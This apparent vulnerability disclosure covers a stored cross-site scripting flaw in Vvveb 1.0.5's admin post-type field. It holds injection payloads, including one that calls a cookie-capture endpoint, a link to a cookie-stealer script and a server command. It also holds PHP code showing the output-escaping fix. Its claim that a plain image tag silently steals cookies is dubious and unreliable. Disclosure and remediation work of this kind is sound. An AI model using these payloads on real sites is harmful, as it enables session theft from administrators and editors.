Submit #625003: Vvveb 1.0.5 Cross Site Scripting

Title: Vvveb 1.0.5 Cross Site Scripting
Description:

The endpoint at [/vadmin123/index.php?module=settings/post-types] is vulnerable to XSS. When a payload is applied here, it makes the whole site and every endpoint accessed through [/vadmin123/] vulnerable to attack. This vulnerability can be exploited as long as you are either a "Site Administrator", "Administrator" or "Super Administrator". A well-crafted XSS payload can be used to harvest cookies from multiple site admins, editors, vendors and everyone else.

Reproduce:

1. Log in as a moderator with the "Site Administrator" role and open the following endpoint: /vadmin123/index.php?module=settings/post-types
2. On the top left, click on the "Add type" button.
3. From here you can add a post type; in the [name="post_type[type]"] field you can enter a payload like the following:

"><img src='http://127.0.0.1:1718/capture.php'>

This payload will execute any time anyone logs in through the admin panel [/vadmin123/]; it executes malicious JavaScript used for stealing cookies silently. To set up a cookie stealer server, you can save the following PHP script as capture.php: https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Start a PHP server to serve it:

$ php -S x.x.x.x:1718

Can also be exploited with:

<img/src=x onerror=alert(2025)>
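The root cause described above is a stored value (the post-type name) being written back into the admin HTML without output encoding. The following is an added example, not Vvveb's own code: it assumes a hypothetical template that echoes the stored name into an attribute and a text node, shows the unescaped rendering beside an escaped one, and uses the two payload strings quoted in the report as constructed sample input.

```php
<?php
// Added example (not Vvveb's code): escape a stored post-type name before it is
// rendered into admin HTML, so a stored payload is displayed as text instead of
// being parsed as markup. The template shape below is a hypothetical stand-in.

declare(strict_types=1);

/** Escape a value for insertion into HTML text content or a quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES converts both ' and ", so the value is safe inside single- or
    // double-quoted attributes as well as in text nodes; ENT_SUBSTITUTE avoids
    // returning an empty string on invalid UTF-8.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable rendering: the stored name is interpolated unescaped (the pattern the report describes). */
function renderRowVulnerable(string $type): string
{
    return '<input name="post_type[type]" value="' . $type . '"> <span>' . $type . '</span>';
}

/** Hardened rendering: every interpolation goes through h(). */
function renderRowSafe(string $type): string
{
    return '<input name="post_type[type]" value="' . h($type) . '"> <span>' . h($type) . '</span>';
}

// Constructed sample values: the two payload strings quoted in the report.
$samples = [
    "\"><img src='http://127.0.0.1:1718/capture.php'>",
    '<img/src=x onerror=alert(2025)>',
];

foreach ($samples as $type) {
    echo "stored value : $type\n";
    echo "vulnerable   : " . renderRowVulnerable($type) . "\n";
    echo "hardened     : " . renderRowSafe($type) . "\n\n";

    // In the hardened output no '<' or '"' from the stored value survives, so the
    // browser never sees a new tag or an attribute boundary; only the template's
    // own <input> and <span> tags remain.
    if (strpos(renderRowSafe($type), '<img') !== false) {
        throw new RuntimeException('escaping failed');
    }
}
```

Output encoding at render time is the fix that closes this class of bug regardless of where the value came from; restricting post-type names at input time to the slug characters they actually need (letters, digits, `_`, `-`) is a reasonable complementary control, but not a substitute, since the stored value may reach other templates or be edited through another path.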
Source: https://hkohi.ca/vulnerability/11
User: 0xHamy (UID 88518)
Submission: 07/29/2025 20:47 (9 months ago)
Moderation: 08/04/2025 08:27 (5 days later)
Status: Accepted
VulDB entry: 318647 [givanz Vvveb up to 1.0.5 Add Type post-types cross site scripting]
Points: 20